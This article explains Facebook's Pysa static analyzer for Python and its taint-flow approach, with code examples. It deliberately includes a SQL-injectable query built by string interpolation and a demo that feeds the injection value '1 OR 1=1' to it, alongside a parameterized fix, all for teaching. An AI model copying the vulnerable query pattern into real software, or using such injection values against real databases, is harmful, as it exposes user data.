PYSA to detect and prevent security issues in Python code

Pysa: Facebook’s open-source static analysis tool

Pysa is an open-source static analysis tool built by Facebook to detect and prevent security and privacy issues in Python code. The name is an acronym for Python Static Analyzer.

Pysa is a security-focused tool built on top of Pyre, Facebook’s type checker for Python. It analyzes how data flows through code. Data flow analysis is useful because many security and privacy issues can be modeled as data flowing into a place it shouldn’t go, which lets Pysa detect a wide range of issues.

For example, Facebook uses Pysa to check how its Python code makes use of certain internal frameworks, which are designed to prevent access to or disclosure of user data based on technical privacy policies.

Pysa also detects common web app security issues such as SQL injection and cross-site scripting (XSS). It helps Facebook scale its application security efforts for Python, most notably for the codebase that powers Instagram’s servers.

Pysa on Instagram —

One of the largest Python codebases at Facebook is the millions of lines that power Instagram’s servers. An automated analyzer like Pysa is an important tool for maintaining quality and security in a codebase of that size. Run against a developer’s code, it returns results far sooner than a manual review, which could take weeks.

How does Pysa work?

Pysa was developed with the lessons learned from Zoncolan, Facebook’s static analyzer for Hack code, in mind. It uses the same algorithms to perform its analysis and even shares some code with Zoncolan. Pysa tracks flows of data through a program, from sources to sinks. The most common kinds of sources are places where user-controlled data enters the application, such as Django’s HttpRequest.GET dictionary. Sinks tend to be much more varied, but can include APIs that execute code, such as eval, or APIs that access the file system. Pysa performs iterative rounds of analysis to build summaries that determine which functions return data from a source and which functions have parameters that eventually reach a sink. When a source eventually connects to a sink, Pysa reports an issue. Visualizing this process creates a tree with the issue at the apex and the sources and sinks at the leaves.
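The summary-building idea can be illustrated with a toy fixed-point loop. This is only a minimal sketch and not Pysa’s actual implementation: the call graph, the function names (handler, fetch_rows, run_query, db_execute, log_visit, write_counter) and the data layout are all hypothetical, and each call simply forwards one parameter to the callee.

```python
from typing import Dict, List, Set, Tuple

Param = Tuple[str, int]  # (function name, parameter index)

# Hypothetical toy program: for each function, the calls it makes, written as
# (caller parameter index, callee name, callee parameter index).
CALLS: Dict[str, List[Tuple[int, str, int]]] = {
    "handler": [(0, "fetch_rows", 0)],
    "fetch_rows": [(0, "run_query", 0)],
    "run_query": [(0, "db_execute", 0)],
    "log_visit": [(0, "write_counter", 0)],
}

# Hypothetical sink: the first parameter of db_execute runs raw SQL.
SINKS: Set[Param] = {("db_execute", 0)}

# Hypothetical parameters that receive user-controlled data from a source.
SOURCED: Set[Param] = {("handler", 0), ("log_visit", 0)}


def build_sink_summaries(
    calls: Dict[str, List[Tuple[int, str, int]]], sinks: Set[Param]
) -> Set[Param]:
    """Repeat rounds until no new parameter is found to reach a sink."""
    reaches = set(sinks)
    changed = True
    while changed:
        changed = False
        for caller, edges in calls.items():
            for caller_param, callee, callee_param in edges:
                # A parameter reaches a sink if it is forwarded to a
                # parameter that is already known to reach one.
                if (callee, callee_param) in reaches and (caller, caller_param) not in reaches:
                    reaches.add((caller, caller_param))
                    changed = True
    return reaches


def find_issues(
    calls: Dict[str, List[Tuple[int, str, int]]],
    sinks: Set[Param],
    sourced: Set[Param],
) -> List[Param]:
    """Report every source-fed parameter whose summary says it reaches a sink."""
    summaries = build_sink_summaries(calls, sinks)
    return sorted(p for p in sourced if p in summaries)


if __name__ == "__main__":
    print(find_issues(CALLS, SINKS, SOURCED))
```

In this sketch the summary for handler only appears in the third round, after run_query and fetch_rows have been summarized, which is why the analysis has to iterate. The log_visit flow is not reported because it never reaches a sink.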


Positives and negatives —

According to Facebook’s engineers, Pysa produces both false positives and false negatives, and they have to decide how to deal with each.

  • False positives occur when a tool reports that a security issue is present where none exists.
  • False negatives occur when a tool fails to detect and report when a real security issue is present.

Pysa offers two kinds of functionality that help users deal with false positives:

  • Sanitizers: During analysis, a sanitizer tells Pysa to completely stop following a data flow after it passes through a function or is assigned to an attribute. Sanitizers allow users to encode their domain-specific knowledge about transformations that will always render data benign from a security perspective.
  • Features: A feature is a small piece of metadata that can be attached to flows of data as they are tracked through the code. Unlike a sanitizer, a feature never removes any issue from Pysa’s results.
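The difference between the two can be sketched with a toy model in which a data flow is just the list of functions the data passes through. This is an illustration under stated assumptions, not Pysa’s API: the function names (request_get, escape_html, to_int, render, run_query) and the feature label are hypothetical.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# Hypothetical sanitizer: data is assumed benign once it has passed through it.
SANITIZERS: Set[str] = {"escape_html"}

# Hypothetical feature: a label attached to any flow that passes through to_int.
FEATURES: Dict[str, str] = {"to_int": "via-int-conversion"}


@dataclass
class ReportedFlow:
    path: List[str]
    features: Set[str] = field(default_factory=set)


def follow_flow(path: List[str]) -> Optional[ReportedFlow]:
    """Walk a source-to-sink path; return None if a sanitizer cuts the flow."""
    features: Set[str] = set()
    for function in path:
        if function in SANITIZERS:
            # A sanitizer stops the analysis from following the flow at all.
            return None
        if function in FEATURES:
            # A feature only annotates the flow; the issue is still reported.
            features.add(FEATURES[function])
    return ReportedFlow(path, features)


if __name__ == "__main__":
    print(follow_flow(["request_get", "escape_html", "render"]))
    print(follow_flow(["request_get", "to_int", "run_query"]))
```

The first flow disappears from the results entirely, while the second is still reported and carries a label that a reviewer could use to filter or prioritize it.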

Where is Pysa most useful?

Imagine that an engineer has written the following code.

# views/
async def get_profile(request: HttpRequest) -> HttpResponse:
   # request.GET is user-controlled, so user_id comes from a source
   profile = await load_profile(request.GET['user_id'])
   ...

# controller/
async def load_profile(user_id: str):
   user = await load_user(user_id) # Loads a user safely; no SQL injection
   pictures = await load_pictures(user.id)
   ...

# model/
async def load_pictures(user_id: str):
   # The query is built by string interpolation: a potential SQL injection
   query = f"""
      SELECT *
      FROM pictures
      WHERE user_id = {user_id}
   """
   result = await run_query(query)
   ...

# model/
async def run_query(query: str):
   connection = create_sql_connection()
   result = await connection.execute(query)
   ...

The potential SQL injection in load_pictures is not exploitable, because that function will only ever receive the valid user_id that resulted from calling load_user in the load_profile function.

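Now suppose an engineer realizes that fetching the user and the picture data concurrently would return results faster, and changes load_profile accordingly:

# controller/
import asyncio
async def load_profile(user_id: str):
   user, pictures = await asyncio.gather(
      load_user(user_id),
      load_pictures(user_id),
   )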

This change may look innocuous but ends up connecting the user-controlled user_id string directly to the SQL injection issue in load_pictures. In a large application with many layers between the entry point and database queries, this engineer might never realize that the data is fully user-controlled, or that a SQL injection issue lurks in one of the functions called.
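To make the risk concrete, here is a small self-contained sketch using Python’s built-in sqlite3 module. The table contents and the two helper functions (load_pictures_unsafe and load_pictures_safe) are hypothetical and only loosely mirror the example above; the point is to contrast an interpolated query with a parameterized one.

```python
import sqlite3
from typing import List


def make_db() -> sqlite3.Connection:
    """Create an in-memory database with two users' pictures (made-up data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pictures (user_id INTEGER, url TEXT)")
    conn.executemany(
        "INSERT INTO pictures VALUES (?, ?)",
        [(1, "a.jpg"), (2, "b.jpg")],
    )
    return conn


def load_pictures_unsafe(conn: sqlite3.Connection, user_id: str) -> List[str]:
    # String interpolation: user_id becomes part of the SQL text itself.
    query = f"SELECT url FROM pictures WHERE user_id = {user_id}"
    return [row[0] for row in conn.execute(query)]


def load_pictures_safe(conn: sqlite3.Connection, user_id: str) -> List[str]:
    # Parameter binding: user_id is passed as a value, never parsed as SQL.
    query = "SELECT url FROM pictures WHERE user_id = ?"
    return [row[0] for row in conn.execute(query, (user_id,))]


if __name__ == "__main__":
    conn = make_db()
    malicious = "1 OR 1=1"  # attacker-supplied value for user_id
    print(sorted(load_pictures_unsafe(conn, malicious)))  # every user's pictures
    print(load_pictures_safe(conn, malicious))  # no rows match
```

With the interpolated query, the attacker-controlled string rewrites the WHERE clause and returns every user’s pictures. The parameterized version treats the same string as a plain value that matches no row.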

Open-source Pysa:

Facebook has made Pysa open source so that others can use it to find security issues in their own Python code. Pysa also comes with models for several open-source Python frameworks, such as Django and Tornado, so it can start finding security issues in projects that use them from the first run.

Limitation —

There is no way to build a perfect static analyzer. Pysa has limitations that stem from its choice to detect only security issues that can be modeled as data flows, together with design decisions that trade off performance against precision and accuracy.
